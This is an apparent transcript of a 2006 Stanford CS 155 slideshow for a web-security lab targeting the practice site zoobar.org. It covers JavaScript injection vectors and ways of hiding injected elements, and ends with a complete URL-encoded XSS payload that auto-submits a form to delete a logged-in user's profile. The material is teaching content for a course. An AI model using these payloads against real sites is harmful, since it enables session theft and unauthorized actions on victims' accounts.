Project 2: Web App Security

About This Presentation

Title:

Project 2: Web App Security

Description:

node.style.visibility = hidden'; // still takes up space ... 'visibility:hidden' ... Open page with form in hidden iframe iframe name=myframe style='visibility: ... – PowerPoint PPT presentation

Number of Views:95

Avg rating:3.0/5.0

Slides: 30

Provided by: anted

Learn more at: https://crypto.stanford.edu

Category:

more less

Transcript and Presenter's Notes

Title: Project 2: Web App Security

1
Project 2 Web App Security
CS 155
Spring 2006

Collin Jackson

2
Deadlines
3
Part 1

Attacks

4
Overview

Explore several
attack types
Requires both
effectiveness
and stealth
Learn
How an attacker can evade sanitization
Consequences of an exploit
JavaScript
Very basic CSS

5
Attacks

Attack A Cookie Theft
Use URL encoding
Could hijack session
Attack C Login Snooping
Evade sanitization
Handle DOM events

Attack B Silent Transfer
Navigate browser
Use iframes, forms
Attack D Profile Worm
Confuse site scripts
Replicate

form
email
link
zoobar.org
zoobar.org
badguy.com
redirect
stanford.edu
form
badguy.com
email
zoobar.org
zoobar.org
6
JavaScript

Browser scripting language with C-like syntax
Sandboxed, garbage collected
Closures
var x 3 var y function() alert(x)
return y
Encapsulation/objects
function X() this.y 3 var z new X()
alert(z.y)
Can interpret data as code (eval)
Browser-dependent

7
Invoking JavaScript

Tags ltscriptgtalert( Hello world! )lt/scriptgt
Links javascriptalert( Hello world! )
Wrap code in void if it has return value
Event handlers
ltform onsubmitalert( Hello world! )gt
ltiframe onloadalert( Hello world! )gt
CSS (IE only)
ltstylegtbody background url(javascriptalert(
Hello world! ))
lt/stylegt

8
DOM Manipulation Examples

document.getElementByID(id)
document.getElementsByTagName(tag)
document.write(htmltext)
document.createElement(tagname)
document.body.appendChild(node)
document.formsindex.fieldname.value
document.formname.fieldname.value
frame.contentDocument.getElementById(id)

9
Arrays and Loops

Example Change href of all links on a page
var links document.getElementsByTagName(a)
for(var i 0 i lt links.length i)
var link linksi
link.href javascriptalert(Sorry!)

10
Other Useful Functions

Navigation
document.location
document.formname.submit()
document.forms0.submitfield.click()
Delayed Events
node.addEventListener(eventname, handler,
useCapture)
node.removeEventListener(eventname, handler,
useCapture)
window.setTimeout(handler, milliseconds)

11
Stealthy Styles

var node document.getElementByID(mynodeid)
node.style.display none // may not load at
all
node.style.visibility hidden // still takes
up space
node.style.position absolute // not included
in flow
document.write( // can also write CSS rules to
page
ltstylegtmynodeid visibilityhidden
lt/stylegt)

12
Example Profile Deleter
???

Malicious hyperlink deletes
profile of user who clicks it
Only works when user logged in
User might have multiple tabs open
Might have chosen/forgotten not to log out
Might appear in another users profile
Uses vulnerability in users.php from Attack A
Constructs profile deletion form and submits it

13
Find vulnerability
Site reflects query parameter in input field
Link can include anything we want here
14
Copy form data
View source to find form fields
Create copycat form with our modifications
15
URL encode
Close previous ltinputgt, ltformgt
Button click triggers form submit
16
Debugging
It didnt work.
Open JavaScript console
Check error
Undefined ? No properties!
Two forms with same name
17
Fixed version
Now with correct form
18
Final Test
http//zoobar.org/users.php?user223E3C2Fform
3E3Cform20method3D22POST2220name3Dprofilefo
rm 0D2020action3D222Findex2Ephp223E0D3C
textarea20name3D22profile5Fupdate223E3C 2F
textarea3E3Cbr2F3E0D3Cinput20type3Dsubmit
20name3D22profile5Fsubmit2220value3D22 Save
20Profile223E3C2Fform3E0D3Cscript3Edocume
nt2Eforms5B15D2Eprofile5Fsubmit2Eclick28 2
93C2Fscript3E
users.php replaced with index.php
Profile deleted
19
Stealthier approaches